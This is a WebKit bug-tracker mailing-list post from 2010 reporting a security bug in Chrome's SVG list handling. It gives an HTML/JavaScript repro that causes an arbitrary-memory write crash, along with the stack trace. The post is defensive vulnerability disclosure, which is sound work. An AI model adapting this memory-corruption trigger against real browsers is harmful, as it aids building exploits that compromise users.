[Webkit-unassigned] [Bug 49061] New: chrome.dll!WebCore::SVGListPropertyTearOff<...>::getItem WriteAV at Arbitrary (578c0f7f21ca517ba29a4eafb7099c1b)

bugzilla-daemon at webkit.org bugzilla-daemon at webkit.org
Fri Nov 5 02:26:47 PDT 2010 

https://bugs.webkit.org/show_bug.cgi?id=49061

           Summary: chrome.dll!WebCore::SVGListPropertyTearOff<...>::getIt
                    em WriteAV at Arbitrary
                    (578c0f7f21ca517ba29a4eafb7099c1b)
           Product: WebKit
           Version: 528+ (Nightly build)
          Platform: PC
               URL: http://code.google.com/p/chromium/issues/detail?id=620
                    31
        OS/Version: Windows Vista
            Status: NEW
          Severity: Normal
          Priority: P1
         Component: SVG
        AssignedTo: webkit-unassigned at lists.webkit.org
        ReportedBy: skylined at chromium.org
                CC: eric at webkit.org, zimmermann at kde.org,
                    mdelaney at apple.com


Created an attachment (id=73047)
 --> (https://bugs.webkit.org/attachment.cgi?id=73047&action=review)
Repro

Repro:
<html><head><script>
  function go() {
    var oSvgFEMorphologyElement = parent.document.createElementNS("http://www.w3.org/2000/svg", "feMorphology");
    var oSvgTextElement = parent.document.createElementNS("http://www.w3.org/2000/svg", "text");
    var oSvgRectElement = parent.document.createElementNS("http://www.w3.org/2000/svg", "rect");
    var oSvgLength = oSvgRectElement.height.animVal;
    oSvgTextElement.x.baseVal.insertItemBefore(oSvgLength,0000013);
    oAnimVal = oSvgTextElement.x.animVal;
    oSvgTextElement.x.baseVal.insertItemBefore(oSvgFEMorphologyElement.height.animVal, 2639);
    oSvgTextElement.x.animVal.getItem(1);
    console.log(oAnimVal);
    location.reload();
  }
</script></head><body onload="go();"></body></html>

This may be the same as issue 48829, which is not marked as security. In case it is, please hide that bug as well.

id:             chrome.dll!WebCore::SVGListPropertyTearOff<...>::getItem WriteAV at Arbitrary (578c0f7f21ca517ba29a4eafb7099c1b)
description:    Security: Attempt to write to unallocated arbitrary memory @ 0x00726576 in chrome.dll!WebCore::SVGListPropertyTearOff<...>::getItem
note:           Based on this information, this is expected to be a security issue!
stack:          chrome.dll!WebCore::SVGListPropertyTearOff<...>::getItem
                chrome.dll!WebCore::SVGLengthListInternal::getItemCallback
                chrome.dll!v8::internal::HandleApiCallHelper<...>
                chrome.dll!v8::internal::Builtin_HandleApiCall
                chrome.dll!v8::internal::Invoke
                chrome.dll!v8::internal::Execution::Call
                ...

-- 
Configure bugmail: https://bugs.webkit.org/userprefs.cgi?tab=email
------- You are receiving this mail because: -------
You are the assignee for the bug.

More information about the webkit-unassigned mailing list